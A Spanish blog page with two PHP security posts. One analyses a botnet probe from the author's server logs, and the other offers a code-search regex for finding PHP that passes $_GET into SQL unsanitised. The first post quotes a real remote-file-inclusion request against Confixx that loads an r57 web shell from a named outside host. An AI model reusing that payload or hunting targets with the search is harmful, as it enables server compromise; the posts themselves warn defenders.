Publicidad:
La Coctelera

Categoría: PHP

BotNets

Posteado por: lacasadelosespiritus el 8 ago En: PHP Linux - sin comentarios

Una red de bots o BotNet es un conjunto de ordenadores que ejecutan tareas de forma autonoma y con un objetivo, asi, dicho burdamente.

Recientemente he visto que mi servidor ha sido 'premiado' con un boleto para pertenecer a una red de este tipo. Lastima que no haya sido agraciado ;)

El origen del ataque procede de una ip suiza (quiza un bot controlado) que intenta buscar y ejecutar en mi servidor lo siguiente:

HEAD http://80.3xxx.xxx.xxx
/admin/business_inc/saveserver.php?thisdir=http://seyyar.by.ru/r57.php?\xa6POST\xa6r57shell\xa6\xa6\xa6 HTTP/1.0

El fichero saveserver.php pertenece a un software llamado Confixx que tiene una variable no declarada que no se valida, thisdir :).

Mas información en securityfocus

PandaLabs descubrio Zunker, un software creado para infectar a traves de la selección cuidadosa de vulnerabilidades de la maquina en cuestion y la posterior ejecucion de los correspondientes exploits.

Mas información de zunker, aqui

En este servidor ruso alojan el zunker, cuidado en donde pinchamos. * http://seyyar.by.ru/

Conclusiones:

Parece que las redes de bots se estan extendiendo y los zombies nos intentan morder a toda costa. Tendremos que tomar las medidas preventivas para evitarlo.

compártelo Tags: servidores, hackers, seguridad, logs, programacion

Buscando bugs en aplicaciones

Posteado por: lacasadelosespiritus el 13 may En: PHP - 2 comentarios

Buscando y leyendo por ahi (http://monkey.org/~jose/presentations/umeet06/slides/?p=0)
veo que hay un monton de aplicaciones con fallos estupidos. A raiz de
esto, me pregunto cuantos pequeños empresarios - y no tan pequeños -
usan estas aplicaciones y en cuantas podran estar nuestros datos por que alguien se haya aprovechado de sus fallos. Por ejemplo, en aquella
tienda en la que te registraste para comprar cualquier cosa.

Hablando de php, si queremos buscar codigo con consultas que
pasan parametros sin 'proteger', metemos esto en codesearch de google:

SELECT\ *[^%]*\.\ *\$_GET lang:php

Basicamente lo que hace es buscar codigos php con consultas sql.

La cantidad de aplicaciones que tienen el mismo problema es impresionate (+4000 !!)

http://www.google.com/codesearch?hl=es&lr=&q=SELECT%5C+*%5B%5E%25%5D*%5C.%5C+*%5C%24_GET+lang%3Aphp+&btnG=B%C3%BAsqueda

¿ Como se pueden resolver estos fallos de programacion ? Simplemente leyendo un poquito y poniendo dedicacion en las cosas que uno hace, asi como responsabilidad. Podemos empezar por leer lo que alguna gente se dedica a crear y recopilar, como PHP Security Guide, y en otros lenguajes, otros tantos documentos.


compártelo Tags: php, programacion, seguridad
La Coctelera: Condiciones de uso Política de Privacidad